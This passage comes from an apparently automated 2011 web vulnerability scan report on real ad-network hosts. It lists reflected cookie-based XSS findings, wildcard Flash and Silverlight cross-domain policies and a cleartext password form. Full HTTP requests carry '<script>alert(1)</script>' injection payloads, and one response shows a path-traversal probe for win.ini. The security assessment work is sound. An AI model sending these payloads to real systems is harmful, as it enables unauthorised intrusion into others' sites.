7 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&a52da<script>alert(1)</script>0e18f0dae67', "UID": '9cc29993-80.67.74.150-1314836282]]>
...[SNIP]...

5.83. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload a7b30<script>alert(1)</script>c18e1b7b6ac was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403?
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&a7b30<script>alert(1)</script>c18e1b7b6ac

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:44:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=249&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:44:36 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:44:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 34267

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C
...[SNIP]...
Sep 17 14:43:05 2011&recExp=Sat Sep 17 14:43:05 2011&prad=65659550&arc=42804711&', "ar_p91136705": 'exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&a7b30<script>alert(1)</script>c18e1b7b6ac', "ar_p10888375389dd4824c74f6d1bc8cd0e3": 'exp=1&initExp=Sat Sep 17 14:42:57 2011&recExp=Sat Sep 17 14:42:57 2011&prad=65659550&arc=42804470&', "../../../../../../../../../windows/win.ini": 'exp=1&i
...[SNIP]...

5.84. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91143664 cookie is copied into the HTML document as plain text between tags. The payload 87988<script>alert(1)</script>beef12b139 was submitted in the ar_p91143664 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403?
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&87988<script>alert(1)</script>beef12b139; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:44:13 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=183&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:44:13 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:44:13 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 34266

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C
...[SNIP]...
%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p91143664": 'exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&87988<script>alert(1)</script>beef12b139', "ar_p108883753'": 'exp=2&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 14:43:10 2011&prad=65659550&arc=42804470&', "ar_p10888375389dd4824d54af3ec28217b10": 'exp=1&initExp=Sat Sep 17 13:09:06
...[SNIP]...

5.85. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 9360d<script>alert(1)</script>4f10f0495de was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403?
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&9360d<script>alert(1)</script>4f10f0495de; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:43:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=127&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:43:53 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:43:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 34267

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C
...[SNIP]...
Sep 17 14:43:12 2011&recExp=Sat Sep 17 14:43:12 2011&prad=65659550&arc=42804470&', "ar_p97174789": 'exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&9360d<script>alert(1)</script>4f10f0495de', "ar_14f8a
e8f18967c2c": 'exp=1&initExp=Sat Sep 17 14:43:08 2011&recExp=Sat Sep 17 14:43:08 2011&prad=65659550&arc=42804470&', "ar_p1088837538f683
b27e0f2581a": 'exp=1&initExp=Sat Sep 17 13:09:10
...[SNIP]...

6. Flash cross-domain policy  previous  next
There are 12 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://adserver.teracent.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"373-1310681141000"
Last-Modified: Thu, 14 Jul 2011 22:05:41 GMT
Content-Type: application/xml
Content-Length: 373
Date: Sat, 17 Sep 2011 13:33:30 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.2. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Sun, 18 Sep 2011 12:41:15 GMT
Date: Sat, 17 Sep 2011 12:41:15 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.3. http://cdn.slidesharecdn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.slidesharecdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.slidesharecdn.com

Response

HTTP/1.0 200 OK
x-amz-id-2: 0vXFTZG8neFdAAnQEKlaE6KpEskPVR4GewkIT4BeR9Xm0rBhUnkmXHE6s50Oy0w8
x-amz-request-id: 4CA09AE8AD1C8BFB
Last-Modified: Mon, 11 Oct 2010 10:20:16 GMT
ETag: "c135d73798bc4bc5aad6d1aa4a8aa073"
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 78
Server: AmazonS3
Date: Sat, 17 Sep 2011 14:45:45 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.4. http://cspix.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:44:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 13 Nov 2008 04:04:22 GMT
ETag: "c8143-120-45b8a3523dd80"
Accept-Ranges: bytes
Content-Length: 288
Connection: close
Content-Type: image/gif

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.5. http://pcdn.tcgmsrv.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pcdn.tcgmsrv.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pcdn.tcgmsrv.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:33:40 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n57.panthercdn.com
ETag: "a0047-175-48e8423f61640"
Cache-Control: max-age=604800
Expires: Fri, 23 Sep 2011 16:44:03 GMT
Age: 74977
Content-Length: 373
Content-Type: application/xml
Last-Modified: Mon, 23 Aug 2010 21:14:57 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.6. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:44:02 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 23:52:41 GMT
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

6.7. http://s.dlqm.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.dlqm.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.dlqm.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:33:52 GMT
Server: Apache
Last-Modified: Thu, 22 Apr 2010 18:40:30 GMT
ETag: "1feaa12-ca-484d7a52d6637"
Accept-Ranges: bytes
Content-Length: 202
Keep-Alive: timeout=120, max=392
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_iuuq-t.emrn.ofu=445836713660;Version=1;Max-Age=1200;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.8. http://s1.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s1.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 17 Sep 2011 02:43:22 GMT
Expires: Sat, 17 Sep 2011 02:43:12 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 38764
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.9. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 14:44:03 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.10. http://segs.btrll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segs.btrll.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:42:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Last-Modified: Wed, 27 Oct 2010 21:47:51 GMT
ETag: "28e808b-10d-493a02d4e4fc0"
Accept-Ranges: bytes
Content-Length: 269
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.11. http://survey.questionmarket.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: survey.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:49 GMT
Server: Apache
Last-Modified: Thu, 22 Apr 2010 18:40:30 GMT
ETag: "1feaa12-ca-484d7a52d6637"
Accept-Ranges: bytes
Content-Length: 202
Keep-Alive: timeout=120, max=859
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.12. http://www.slideshare.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slideshare.net

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/xml; charset=utf-8
Last-Modified: Fri, 16 Sep 2011 21:56:56 GMT
Expires: Sat, 17 Sep 2011 22:04:27 GMT
Cache-Control: max-age=86400
Content-Length: 222
Date: Sat, 17 Sep 2011 14:45:35 GMT
X-Varnish: 715112579 703510786
Age: 60068
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />

...[SNIP]...

7. Silverlight cross-domain policy  previous  next
There are 3 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Sun, 18 Sep 2011 12:41:15 GMT
Date: Sat, 17 Sep 2011 12:41:15 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.2. http://pixel.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:44:03 GMT
Server: Apache
Last-Modified: Fri, 22 Jul 2011 00:03:04 GMT
Accept-Ranges: bytes
Content-Length: 335
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

7.3. http://s1.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s1.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 17 Sep 2011 03:39:35 GMT
Expires: Sat, 17 Sep 2011 03:26:34 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 35391
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


8.1. http://www.peopleschoice.com/pca/polls/poll.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peopleschoice.com
Path:   /pca/polls/poll.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pca/polls/poll.jsp?pollId=1000000270 HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://wonderwall.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
